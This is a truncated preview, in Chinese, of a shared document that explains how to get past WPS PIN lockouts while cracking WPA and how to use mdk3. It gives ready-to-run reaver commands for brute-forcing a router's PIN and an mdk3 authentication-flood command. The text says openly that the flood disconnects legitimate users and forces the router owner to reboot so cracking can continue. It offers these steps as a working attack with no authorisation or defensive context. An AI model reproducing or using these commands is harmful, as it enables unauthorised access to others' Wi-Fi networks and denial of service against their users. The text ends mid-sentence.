PIN死循环解决方法及mdk3攻击模式详解.docVIP

  • 35
  • 0
  • 约3.3千字
  • 约 10页
  • 2019-03-29 发布于江苏
  • 举报

PIN死循环解决方法及mdk3攻击模式详解.doc

破解WPA时,PIN出现死循环处理方法。 如下面这个例子,一开始,或者破解一段时间后出来PIN无限循环: ------个人心得--------------------------------------------------------- 对一个ap刚开始pin的时候打开-vv参数,如果顺利,就中断,然后改成-v继续pin,反正进度是可以保存的 reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S 如果一直pin不动,尝试加-N参数 reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S –N AP洪水攻击 1、打气筒 mdk3攻击模式操作方法 首先检测网卡: ifconfig -a 然后模拟端口: airmon-ng start wlan0 接下来用: airodump-ng mon0 扫描ap找到你pin死的路由器mac 用mdk3 做身份验证攻击 mdk3 mon0 a -a mac(被pin死的路由器的mac) 身份验证攻击效果说明: 此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。 说明: 此命令功

文档评论(0)

1亿VIP精品文档

相关文档